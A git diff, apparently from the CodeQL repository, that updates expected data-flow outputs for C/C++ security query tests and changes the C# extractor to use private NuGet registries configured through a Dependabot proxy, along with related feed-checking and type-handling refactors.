consts.cpp:26:2:26:4 | *b | provenance | | +| consts.cpp:26:2:26:4 | *b | consts.cpp:24:7:24:9 | **gv1 | provenance | | | consts.cpp:29:7:29:25 | **nonConstFuncToArray | consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | provenance | | | consts.cpp:30:9:30:14 | *access to array | consts.cpp:29:7:29:25 | **nonConstFuncToArray | provenance | | | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:86:9:86:10 | *v1 | provenance | | @@ -25,8 +28,7 @@ edges | consts.cpp:106:13:106:19 | *call to varFunc | consts.cpp:107:9:107:10 | *v5 | provenance | | | consts.cpp:111:2:111:15 | *... = ... | consts.cpp:112:9:112:10 | *v6 | provenance | | | consts.cpp:111:7:111:13 | *call to varFunc | consts.cpp:111:2:111:15 | *... = ... | provenance | | -| consts.cpp:115:17:115:18 | *v1 | consts.cpp:116:9:116:13 | *access to array | provenance | | -| consts.cpp:115:17:115:18 | *v1 | consts.cpp:120:2:120:11 | *... = ... | provenance | | +| consts.cpp:115:17:115:18 | *v1 | consts.cpp:115:21:115:22 | *v2 | provenance | | | consts.cpp:115:21:115:22 | *v2 | consts.cpp:116:9:116:13 | *access to array | provenance | | | consts.cpp:115:21:115:22 | *v2 | consts.cpp:120:2:120:11 | *... = ... | provenance | | | consts.cpp:120:2:120:11 | *... = ... | consts.cpp:121:9:121:10 | *v8 | provenance | | @@ -36,6 +38,8 @@ edges | consts.cpp:144:16:144:18 | readStringRef output argument | consts.cpp:145:9:145:11 | *v12 | provenance | | nodes | consts.cpp:24:7:24:9 | **gv1 | semmle.label | **gv1 | +| consts.cpp:25:2:25:4 | *a | semmle.label | *a | +| consts.cpp:26:2:26:4 | *b | semmle.label | *b | | consts.cpp:29:7:29:25 | **nonConstFuncToArray | semmle.label | **nonConstFuncToArray | | consts.cpp:30:9:30:14 | *access to array | semmle.label | *access to array | | consts.cpp:85:7:85:8 | gets output argument | semmle.label | gets output argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.expected index e55caaa63728..0cfd3b0413ee 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.expected @@ -27,6 +27,10 @@ edges | test.cpp:53:5:53:23 | ... = ... | test.cpp:51:33:51:35 | *end | provenance | | | test.cpp:53:12:53:23 | ... + ... | test.cpp:53:5:53:23 | ... = ... | provenance | | | test.cpp:60:34:60:37 | mk_array output argument | test.cpp:67:9:67:14 | ... = ... | provenance | Config | +| test.cpp:60:34:60:37 | mk_array output argument | test.cpp:67:9:67:14 | ... = ... | provenance | Config | +| test.cpp:66:37:66:39 | *++ ... | test.cpp:67:9:67:14 | ... = ... | provenance | | +| test.cpp:66:37:66:39 | *++ ... | test.cpp:67:9:67:14 | ... = ... | provenance | | +| test.cpp:67:9:67:14 | ... = ... | test.cpp:66:37:66:39 | *++ ... | provenance | | | test.cpp:205:15:205:33 | call to malloc | test.cpp:205:15:205:33 | call to malloc | provenance | | | test.cpp:205:15:205:33 | call to malloc | test.cpp:206:17:206:23 | ... + ... | provenance | Config | | test.cpp:206:17:206:23 | ... + ... | test.cpp:206:17:206:23 | ... + ... | provenance | | @@ -47,6 +51,11 @@ edges | test.cpp:271:14:271:21 | ... + ... | test.cpp:271:14:271:21 | ... + ... | provenance | | | test.cpp:271:14:271:21 | ... + ... | test.cpp:274:5:274:10 | ... = ... | provenance | Config | | test.cpp:271:14:271:21 | ... + ... | test.cpp:274:5:274:10 | ... = ... | provenance | Config | +| test.cpp:271:14:271:21 | ... + ... | test.cpp:274:5:274:10 | ... = ... | provenance | Config | +| test.cpp:271:14:271:21 | ... + ... | test.cpp:274:5:274:10 | ... = ... | provenance | Config | +| test.cpp:272:31:272:33 | *... ++ | test.cpp:274:5:274:10 | ... = ... | provenance | | +| test.cpp:272:31:272:33 | *... ++ | test.cpp:274:5:274:10 | ... = ... | provenance | | +| test.cpp:274:5:274:10 | ... = ... | test.cpp:272:31:272:33 | *... ++ | provenance | | | test.cpp:355:14:355:27 | new[] | test.cpp:355:14:355:27 | new[] | provenance | | | test.cpp:355:14:355:27 | new[] | test.cpp:356:15:356:23 | ... + ... | provenance | Config | | test.cpp:356:15:356:23 | ... + ... | test.cpp:356:15:356:23 | ... + ... | provenance | | @@ -114,9 +123,18 @@ edges | test.cpp:794:5:794:24 | ... = ... | test.cpp:792:60:792:62 | *end | provenance | | | test.cpp:794:12:794:24 | ... + ... | test.cpp:794:5:794:24 | ... = ... | provenance | | | test.cpp:800:40:800:43 | mk_array_no_field_flow output argument | test.cpp:807:7:807:12 | ... = ... | provenance | Config | +| test.cpp:800:40:800:43 | mk_array_no_field_flow output argument | test.cpp:807:7:807:12 | ... = ... | provenance | Config | +| test.cpp:806:35:806:37 | *++ ... | test.cpp:807:7:807:12 | ... = ... | provenance | | +| test.cpp:806:35:806:37 | *++ ... | test.cpp:807:7:807:12 | ... = ... | provenance | | +| test.cpp:807:7:807:12 | ... = ... | test.cpp:806:35:806:37 | *++ ... | provenance | | | test.cpp:815:52:815:54 | end | test.cpp:815:52:815:54 | end | provenance | | | test.cpp:815:52:815:54 | end | test.cpp:821:7:821:12 | ... = ... | provenance | Config | | test.cpp:815:52:815:54 | end | test.cpp:821:7:821:12 | ... = ... | provenance | Config | +| test.cpp:815:52:815:54 | end | test.cpp:821:7:821:12 | ... = ... | provenance | Config | +| test.cpp:815:52:815:54 | end | test.cpp:821:7:821:12 | ... = ... | provenance | Config | +| test.cpp:820:35:820:37 | *++ ... | test.cpp:821:7:821:12 | ... = ... | provenance | | +| test.cpp:820:35:820:37 | *++ ... | test.cpp:821:7:821:12 | ... = ... | provenance | | +| test.cpp:821:7:821:12 | ... = ... | test.cpp:820:35:820:37 | *++ ... | provenance | | | test.cpp:832:40:832:43 | mk_array_no_field_flow output argument | test.cpp:833:37:833:39 | end | provenance | | | test.cpp:833:37:833:39 | end | test.cpp:815:52:815:54 | end | provenance | | | test.cpp:841:18:841:35 | call to malloc | test.cpp:841:18:841:35 | call to malloc | provenance | | @@ -157,6 +175,8 @@ nodes | test.cpp:53:5:53:23 | ... = ... | semmle.label | ... = ... | | test.cpp:53:12:53:23 | ... + ... | semmle.label | ... + ... | | test.cpp:60:34:60:37 | mk_array output argument | semmle.label | mk_array output argument | +| test.cpp:66:37:66:39 | *++ ... | semmle.label | *++ ... | +| test.cpp:67:9:67:14 | ... = ... | semmle.label | ... = ... | | test.cpp:67:9:67:14 | ... = ... | semmle.label | ... = ... | | test.cpp:205:15:205:33 | call to malloc | semmle.label | call to malloc | | test.cpp:205:15:205:33 | call to malloc | semmle.label | call to malloc | @@ -174,6 +194,8 @@ nodes | test.cpp:270:13:270:24 | new[] | semmle.label | new[] | | test.cpp:271:14:271:21 | ... + ... | semmle.label | ... + ... | | test.cpp:271:14:271:21 | ... + ... | semmle.label | ... + ... | +| test.cpp:272:31:272:33 | *... ++ | semmle.label | *... ++ | +| test.cpp:274:5:274:10 | ... = ... | semmle.label | ... = ... | | test.cpp:274:5:274:10 | ... = ... | semmle.label | ... = ... | | test.cpp:355:14:355:27 | new[] | semmle.label | new[] | | test.cpp:355:14:355:27 | new[] | semmle.label | new[] | @@ -240,9 +262,13 @@ nodes | test.cpp:794:5:794:24 | ... = ... | semmle.label | ... = ... | | test.cpp:794:12:794:24 | ... + ... | semmle.label | ... + ... | | test.cpp:800:40:800:43 | mk_array_no_field_flow output argument | semmle.label | mk_array_no_field_flow output argument | +| test.cpp:806:35:806:37 | *++ ... | semmle.label | *++ ... | +| test.cpp:807:7:807:12 | ... = ... | semmle.label | ... = ... | | test.cpp:807:7:807:12 | ... = ... | semmle.label | ... = ... | | test.cpp:815:52:815:54 | end | semmle.label | end | | test.cpp:815:52:815:54 | end | semmle.label | end | +| test.cpp:820:35:820:37 | *++ ... | semmle.label | *++ ... | +| test.cpp:821:7:821:12 | ... = ... | semmle.label | ... = ... | | test.cpp:821:7:821:12 | ... = ... | semmle.label | ... = ... | | test.cpp:832:40:832:43 | mk_array_no_field_flow output argument | semmle.label | mk_array_no_field_flow output argument | | test.cpp:833:37:833:39 | end | semmle.label | end | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected index 42718aa4a388..fae3d76599a8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected @@ -16,7 +16,8 @@ edges | test3.cpp:138:24:138:32 | password1 | test3.cpp:138:21:138:22 | call to id | provenance | | | test3.cpp:144:16:144:29 | call to get_global_str | test3.cpp:144:16:144:29 | call to get_global_str | provenance | | | test3.cpp:144:16:144:29 | call to get_global_str | test3.cpp:146:15:146:18 | data | provenance | | -| test3.cpp:157:19:157:26 | password | test3.cpp:159:15:159:20 | *buffer | provenance | TaintFunction | +| test3.cpp:157:19:157:26 | password | test3.cpp:158:3:158:16 | ... = ... | provenance | TaintFunction | +| test3.cpp:158:3:158:16 | ... = ... | test3.cpp:159:15:159:20 | *buffer | provenance | | | test3.cpp:270:16:270:23 | password | test3.cpp:272:15:272:18 | *data | provenance | DataFlowFunction | | test3.cpp:278:20:278:23 | data | test3.cpp:280:14:280:17 | data | provenance | | | test3.cpp:283:20:283:23 | data | test3.cpp:285:14:285:17 | data | provenance | | @@ -70,6 +71,7 @@ nodes | test3.cpp:144:16:144:29 | call to get_global_str | semmle.label | call to get_global_str | | test3.cpp:146:15:146:18 | data | semmle.label | data | | test3.cpp:157:19:157:26 | password | semmle.label | password | +| test3.cpp:158:3:158:16 | ... = ... | semmle.label | ... = ... | | test3.cpp:159:15:159:20 | *buffer | semmle.label | *buffer | | test3.cpp:173:15:173:22 | password | semmle.label | password | | test3.cpp:181:15:181:22 | password | semmle.label | password | diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index cad7d33f472b..be5f137548c4 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -1,14 +1,22 @@ using System; -using System.Diagnostics; +using System.Collections.Generic; using System.IO; using System.Security.Cryptography.X509Certificates; using Semmle.Util; using Semmle.Util.Logging; +using Newtonsoft.Json; namespace Semmle.Extraction.CSharp.DependencyFetching { public class DependabotProxy : IDisposable { + /// + /// Represents configurations for package registries. + /// + /// The type of package registry. + /// The URL of the package registry. + public record class RegistryConfig(string Type, string URL); + private readonly string host; private readonly string port; @@ -17,6 +25,10 @@ public class DependabotProxy : IDisposable /// internal string Address { get; } /// + /// The URLs of package registries that are configured for the proxy. + /// + internal HashSet RegistryURLs { get; } + /// /// The path to the temporary file where the certificate is stored. /// internal string? CertificatePath { get; private set; } @@ -67,6 +79,39 @@ public class DependabotProxy : IDisposable result.Certificate = X509Certificate2.CreateFromPem(cert); } + // Try to obtain the list of private registry URLs. + var registryURLs = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyURLs); + + if (!string.IsNullOrWhiteSpace(registryURLs)) + { + try + { + // The value of the environment variable should be a JSON array of objects, such as: + // [ { "type": "nuget_feed", "url": "https://nuget.pkg.github.com/org/index.json" } ] + var array = JsonConvert.DeserializeObject>(registryURLs); + if (array is not null) + { + foreach (RegistryConfig config in array) + { + // The array contains all configured private registries, not just ones for C#. + // We ignore the non-C# ones here. + if (!config.Type.Equals("nuget_feed")) + { + logger.LogDebug($"Ignoring registry at '{config.URL}' since it is not of type 'nuget_feed'."); + continue; + } + + logger.LogInfo($"Found private registry at '{config.URL}'"); + result.RegistryURLs.Add(config.URL); + } + } + } + catch (JsonException ex) + { + logger.LogError($"Unable to parse '{EnvironmentVariableNames.ProxyURLs}': {ex.Message}"); + } + } + return result; } @@ -75,6 +120,7 @@ private DependabotProxy(string host, string port) this.host = host; this.port = port; this.Address = $"http://{this.host}:{this.port}"; + this.RegistryURLs = new HashSet(); } public void Dispose() diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs index dfabb7446186..49d35c944bd8 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs @@ -2,7 +2,6 @@ using System.Collections.Generic; using System.IO; using System.Linq; - using Newtonsoft.Json.Linq; using Semmle.Util; @@ -77,6 +76,11 @@ private string GetRestoreArgs(RestoreSettings restoreSettings) args += " /p:EnableWindowsTargeting=true"; } + if (restoreSettings.ExtraArgs is not null) + { + args += $" {restoreSettings.ExtraArgs}"; + } + return args; } diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/EnvironmentVariableNames.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/EnvironmentVariableNames.cs index d825e5daeb03..589e72d21265 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/EnvironmentVariableNames.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/EnvironmentVariableNames.cs @@ -89,5 +89,10 @@ internal static class EnvironmentVariableNames /// Contains the certificate used by the Dependabot proxy. /// public const string ProxyCertificate = "CODEQL_PROXY_CA_CERTIFICATE"; + + /// + /// Contains the URLs of private nuget registries as a JSON array. + /// + public const string ProxyURLs = "CODEQL_PROXY_URLS"; } } diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/IDotNet.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/IDotNet.cs index 2c10afa80ef2..eec6a2b8d3b2 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/IDotNet.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/IDotNet.cs @@ -17,7 +17,7 @@ public interface IDotNet IList GetNugetFeedsFromFolder(string folderPath); } - public record class RestoreSettings(string File, string PackageDirectory, bool ForceDotnetRefAssemblyFetching, string? PathToNugetConfig = null, bool ForceReevaluation = false, bool TargetWindows = false); + public record class RestoreSettings(string File, string PackageDirectory, bool ForceDotnetRefAssemblyFetching, string? ExtraArgs = null, string? PathToNugetConfig = null, bool ForceReevaluation = false, bool TargetWindows = false); public partial record class RestoreResult(bool Success, IList Output) { diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index 393e37579b71..f1ad43f83f97 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs @@ -103,13 +103,14 @@ public HashSet Restore() compilationInfoContainer.CompilationInfos.Add(("NuGet feed responsiveness checked", checkNugetFeedResponsiveness ? "1" : "0")); HashSet? explicitFeeds = null; + HashSet? allFeeds = null; try { - if (checkNugetFeedResponsiveness && !CheckFeeds(out explicitFeeds)) + if (checkNugetFeedResponsiveness && !CheckFeeds(out explicitFeeds, out allFeeds)) { // todo: we could also check the reachability of the inherited nuget feeds, but to use those in the fallback we would need to handle authentication too. - var unresponsiveMissingPackageLocation = DownloadMissingPackagesFromSpecificFeeds(explicitFeeds); + var unresponsiveMissingPackageLocation = DownloadMissingPackagesFromSpecificFeeds([], explicitFeeds); return unresponsiveMissingPackageLocation is null ? [] : [unresponsiveMissingPackageLocation]; @@ -156,7 +157,7 @@ public HashSet Restore() var restoredProjects = RestoreSolutions(out var container); var projects = fileProvider.Projects.Except(restoredProjects); - RestoreProjects(projects, out var containers); + RestoreProjects(projects, allFeeds, out var containers); var dependencies = containers.Flatten(container); @@ -166,11 +167,11 @@ public HashSet Restore() .ToList(); assemblyLookupLocations.UnionWith(paths.Select(p => new AssemblyLookupLocation(p))); - LogAllUnusedPackages(dependencies); + var usedPackageNames = GetAllUsedPackageDirNames(dependencies); var missingPackageLocation = checkNugetFeedResponsiveness - ? DownloadMissingPackagesFromSpecificFeeds(explicitFeeds) - : DownloadMissingPackages(); + ? DownloadMissingPackagesFromSpecificFeeds(usedPackageNames, explicitFeeds) + : DownloadMissingPackages(usedPackageNames); if (missingPackageLocation is not null) { @@ -260,8 +261,33 @@ private IEnumerable RestoreSolutions(out DependencyContainer dependencie /// Populates dependencies with the relative paths to the assets files generated by the restore. /// /// A list of paths to project files. - private void RestoreProjects(IEnumerable projects, out ConcurrentBag dependencies) + private void RestoreProjects(IEnumerable projects, HashSet? configuredSources, out ConcurrentBag dependencies) { + // Conservatively, we only set this to a non-null value if a Dependabot proxy is enabled. + // This ensures that we continue to get the old behaviour where feeds are taken from + // `nuget.config` files instead of the command-line arguments. + string? extraArgs = null; + + if (this.dependabotProxy is not null) + { + // If the Dependabot proxy is configured, then our main goal is to make `dotnet` aware + // of the private registry feeds. However, since providing them as command-line arguments + // to `dotnet` ignores other feeds that may be configured, we also need to add the feeds + // we have discovered from analysing `nuget.config` files. + var sources = configuredSources ?? new(); + this.dependabotProxy.RegistryURLs.ForEach(url => sources.Add(url)); + + // Add package sources. If any are present, they override all sources specified in + // the configuration file(s). + var feedArgs = new StringBuilder(); + foreach (string source in sources) + { + feedArgs.Append($" -s {source}"); + } + + extraArgs = feedArgs.ToString(); + } + var successCount = 0; var nugetSourceFailures = 0; ConcurrentBag collectedDependencies = []; @@ -276,7 +302,7 @@ private void RestoreProjects(IEnumerable projects, out ConcurrentBag projects, out ConcurrentBag? feedsFromNugetConfigs) + private AssemblyLookupLocation? DownloadMissingPackagesFromSpecificFeeds(IEnumerable usedPackageNames, HashSet? feedsFromNugetConfigs) { var reachableFallbackFeeds = GetReachableFallbackNugetFeeds(feedsFromNugetConfigs); if (reachableFallbackFeeds.Count > 0) { - return DownloadMissingPackages(fallbackNugetFeeds: reachableFallbackFeeds); + return DownloadMissingPackages(usedPackageNames, fallbackNugetFeeds: reachableFallbackFeeds); } logger.LogWarning("Skipping download of missing packages from specific feeds as no fallback Nuget feeds are reachable."); return null; } - private AssemblyLookupLocation? DownloadMissingPackages(IEnumerable? fallbackNugetFeeds = null) + private AssemblyLookupLocation? DownloadMissingPackages(IEnumerable usedPackageNames, IEnumerable? fallbackNugetFeeds = null) { - var alreadyDownloadedPackages = GetRestoredPackageDirectoryNames(PackageDirectory.DirInfo); + var alreadyDownloadedPackages = usedPackageNames.Select(p => p.ToLowerInvariant()); var alreadyDownloadedLegacyPackages = GetRestoredLegacyPackageNames(); var notYetDownloadedPackages = new HashSet(fileContent.AllPackages); @@ -418,17 +444,23 @@ private void RestoreProjects(IEnumerable projects, out ConcurrentBag GetAllUsedPackageDirNames(DependencyContainer dependencies) { var allPackageDirectories = GetAllPackageDirectories(); logger.LogInfo($"Restored {allPackageDirectories.Count} packages"); logger.LogInfo($"Found {dependencies.Packages.Count} packages in project.assets.json files"); - allPackageDirectories - .Where(package => !dependencies.Packages.Contains(package)) + var usage = allPackageDirectories.Select(package => (package, isUsed: dependencies.Packages.Contains(package))); + + usage + .Where(package => !package.isUsed) .Order() - .ForEach(package => logger.LogDebug($"Unused package: {package}")); + .ForEach(package => logger.LogDebug($"Unused package: {package.package}")); + + return usage + .Where(package => package.isUsed) + .Select(package => package.package); } private ICollection GetAllPackageDirectories() @@ -674,10 +706,42 @@ private bool IsFeedReachable(string feed, int timeoutMilliSeconds, int tryCount, return (timeoutMilliSeconds, tryCount); } - private bool CheckFeeds(out HashSet explicitFeeds) + /// + /// Checks that we can connect to all Nuget feeds that are explicitly configured in configuration files + /// as well as any private package registry feeds that are configured. + /// + /// Outputs the set of explicit feeds. + /// Outputs the set of all feeds (explicit and inherited). + /// True if all feeds are reachable or false otherwise. + private bool CheckFeeds(out HashSet explicitFeeds, out HashSet allFeeds) + { + (explicitFeeds, allFeeds) = GetAllFeeds(); + HashSet feedsToCheck = explicitFeeds; + + // If private package registries are configured for C#, then check those + // in addition to the ones that are configured in `nuget.config` files. + this.dependabotProxy?.RegistryURLs.ForEach(url => feedsToCheck.Add(url)); + + var allFeedsReachable = this.CheckSpecifiedFeeds(feedsToCheck); + + var inheritedFeeds = allFeeds.Except(explicitFeeds).ToHashSet(); + if (inheritedFeeds.Count > 0) + { + logger.LogInfo($"Inherited Nuget feeds (not checked for reachability): {string.Join(", ", inheritedFeeds.OrderBy(f => f))}"); + compilationInfoContainer.CompilationInfos.Add(("Inherited Nuget feed count", inheritedFeeds.Count.ToString())); + } + + return allFeedsReachable; + } + + /// + /// Checks that we can connect to the specified Nuget feeds. + /// + /// The set of package feeds to check. + /// True if all feeds are reachable or false otherwise. + private bool CheckSpecifiedFeeds(HashSet feeds) { - logger.LogInfo("Checking Nuget feeds..."); - (explicitFeeds, var allFeeds) = GetAllFeeds(); + logger.LogInfo("Checking that Nuget feeds are reachable..."); var excludedFeeds = EnvironmentVariables.GetURLs(EnvironmentVariableNames.ExcludedNugetFeedsFromResponsivenessCheck) .ToHashSet(); @@ -689,7 +753,7 @@ private bool CheckFeeds(out HashSet explicitFeeds) var (initialTimeout, tryCount) = GetFeedRequestSettings(isFallback: false); - var allFeedsReachable = explicitFeeds.All(feed => excludedFeeds.Contains(feed) || IsFeedReachable(feed, initialTimeout, tryCount)); + var allFeedsReachable = feeds.All(feed => excludedFeeds.Contains(feed) || IsFeedReachable(feed, initialTimeout, tryCount)); if (!allFeedsReachable) { logger.LogWarning("Found unreachable Nuget feed in C# analysis with build-mode 'none'. This may cause missing dependencies in the analysis."); @@ -704,14 +768,6 @@ private bool CheckFeeds(out HashSet explicitFeeds) } compilationInfoContainer.CompilationInfos.Add(("All Nuget feeds reachable", allFeedsReachable ? "1" : "0")); - - var inheritedFeeds = allFeeds.Except(explicitFeeds).ToHashSet(); - if (inheritedFeeds.Count > 0) - { - logger.LogInfo($"Inherited Nuget feeds (not checked for reachability): {string.Join(", ", inheritedFeeds.OrderBy(f => f))}"); - compilationInfoContainer.CompilationInfos.Add(("Inherited Nuget feed count", inheritedFeeds.Count.ToString())); - } - return allFeedsReachable; } @@ -760,23 +816,33 @@ private IEnumerable GetFeeds(Func> getNugetFeeds) } // todo: this could be improved. - // We don't have to get the feeds from each of the folders from below, it would be enought to check the folders that recursively contain the others. - var allFeeds = nugetConfigs - .Select(config => - { - try - { - return new FileInfo(config).Directory?.FullName; - } - catch (Exception exc) + HashSet? allFeeds = null; + + if (nugetConfigs.Count > 0) + { + // We don't have to get the feeds from each of the folders from below, it would be enought to check the folders that recursively contain the others. + allFeeds = nugetConfigs + .Select(config => { - logger.LogWarning($"Failed to get directory of '{config}': {exc}"); - } - return null; - }) - .Where(folder => folder != null) - .SelectMany(folder => GetFeeds(() => dotnet.GetNugetFeedsFromFolder(folder!))) - .ToHashSet(); + try + { + return new FileInfo(config).Directory?.FullName; + } + catch (Exception exc) + { + logger.LogWarning($"Failed to get directory of '{config}': {exc}"); + } + return null; + }) + .Where(folder => folder != null) + .SelectMany(folder => GetFeeds(() => dotnet.GetNugetFeedsFromFolder(folder!))) + .ToHashSet(); + } + else + { + // If we haven't found any `nuget.config` files, then obtain a list of feeds from the root source directory. + allFeeds = GetFeeds(() => dotnet.GetNugetFeedsFromFolder(this.fileProvider.SourceDir.FullName)).ToHashSet(); + } logger.LogInfo($"Found {allFeeds.Count} Nuget feeds (with inherited ones) in nuget.config files: {string.Join(", ", allFeeds.OrderBy(f => f))}"); diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/SourceGenerators/DotnetSourceGeneratorWrapper/DotnetSourceGeneratorWrapper.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/SourceGenerators/DotnetSourceGeneratorWrapper/DotnetSourceGeneratorWrapper.cs index 2feafb8323b5..680802449010 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/SourceGenerators/DotnetSourceGeneratorWrapper/DotnetSourceGeneratorWrapper.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/SourceGenerators/DotnetSourceGeneratorWrapper/DotnetSourceGeneratorWrapper.cs @@ -37,7 +37,8 @@ public IEnumerable RunSourceGenerator(IEnumerable additionalFile { try { - var relativePathToCsProj = Path.GetRelativePath(sourceDir, csprojFile); + var relativePathToCsProj = Path.GetRelativePath(sourceDir, csprojFile) + .Replace('\\', '/'); // Ensure we're generating the same hash regardless of the OS var name = FileUtils.ComputeHash($"{relativePathToCsProj}\n{this.GetType().Name}"); using var tempDir = new TemporaryDirectory(Path.Join(FileUtils.GetTemporaryWorkingDirectory(out _), "source-generator"), "source generator temporary", logger); var analyzerConfigPath = Path.Combine(tempDir.DirInfo.FullName, $"{name}.txt"); diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Assembly.cs b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Assembly.cs index cc36e41ff588..4ad05eea3833 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Assembly.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Assembly.cs @@ -31,7 +31,7 @@ public override void Populate(TextWriter trapFile) { if (assemblyPath is not null) { - var isBuildlessOutputAssembly = isOutputAssembly && Context.ExtractionContext.Mode.HasFlag(ExtractorMode.Standalone); + var isBuildlessOutputAssembly = isOutputAssembly && Context.ExtractionContext.IsStandalone; var identifier = isBuildlessOutputAssembly ? "" : assembly.ToString() ?? ""; @@ -72,7 +72,7 @@ public static Assembly CreateOutputAssembly(Context cx) public override void WriteId(EscapingTextWriter trapFile) { - if (isOutputAssembly && Context.ExtractionContext.Mode.HasFlag(ExtractorMode.Standalone)) + if (isOutputAssembly && Context.ExtractionContext.IsStandalone) { trapFile.Write("buildlessOutputAssembly"); } diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Invocation.cs b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Invocation.cs index 4db35fda985e..a6272974c22b 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Invocation.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Invocation.cs @@ -133,7 +133,7 @@ public IMethodSymbol? TargetSymbol .Where(method => method.Parameters.Length >= Syntax.ArgumentList.Arguments.Count) .Where(method => method.Parameters.Count(p => !p.HasExplicitDefaultValue) <= Syntax.ArgumentList.Arguments.Count); - return Context.ExtractionContext.Mode.HasFlag(ExtractorMode.Standalone) ? + return Context.ExtractionContext.IsStandalone ? candidates.FirstOrDefault() : candidates.SingleOrDefault(); } diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Types/NamedType.cs b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Types/NamedType.cs index b2106febaff3..96c523d5bbdc 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Types/NamedType.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Types/NamedType.cs @@ -166,7 +166,9 @@ private class UnderlyingTupleTypeFactory : CachedEntityFactory Symbol.TypeKind == TypeKind.Error || SymbolEqualityComparer.Default.Equals(Symbol.OriginalDefinition, Symbol); + private bool UsesTypeRef => + Symbol.TypeKind == TypeKind.Error || + SymbolEqualityComparer.Default.Equals(Symbol.OriginalDefinition, Symbol); public override Type TypeRef => UsesTypeRef ? (Type)NamedTypeRef.Create(Context, Symbol) : this; } diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Types/Type.cs b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Types/Type.cs index efd09409afd8..266fbfa5d606 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Types/Type.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Types/Type.cs @@ -25,6 +25,40 @@ public static bool ConstructedOrParentIsConstructed(INamedTypeSymbol symbol) symbol.ContainingType is not null && ConstructedOrParentIsConstructed(symbol.ContainingType); } + + /// + /// A hashset containing the C# contextual keywords that could be confused with types (and typing). + /// + /// For the list of all contextual keywords, see + /// https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/keywords/#contextual-keywords + /// + private readonly HashSet ContextualKeywordTypes = [ + "dynamic", + "nint", + "nuint", + "var" + ]; + + /// + /// Returns true in case we suspect this is a broken type. + /// + /// Type symbol + private bool IsBrokenType(ITypeSymbol symbol) + { + if (!Context.ExtractionContext.IsStandalone || + !symbol.FromSource() || + symbol.IsAnonymousType) + { + return false; + } + + // (1) public class { ... } is a broken type as it doesn't have a name. + // (2) public class var { ... } is an allowed type, but it overrides the `var` keyword for all uses. + // The same goes for other contextual keywords that could be used as type names. + // It is probably a better heuristic to treat these as broken types. + return string.IsNullOrEmpty(symbol.Name) || ContextualKeywordTypes.Contains(symbol.Name); + } + public Kinds.TypeKind GetTypeKind(Context cx, bool constructUnderlyingTupleType) { switch (Symbol.SpecialType) @@ -48,6 +82,9 @@ public Kinds.TypeKind GetTypeKind(Context cx, bool constructUnderlyingTupleType) if (Symbol.IsBoundNullable()) return Kinds.TypeKind.NULLABLE; + if (IsBrokenType(Symbol)) + return Kinds.TypeKind.UNKNOWN; + switch (Symbol.TypeKind) { case TypeKind.Class: return Kinds.TypeKind.CLASS; diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Extractor/BinaryLogExtractionContext.cs 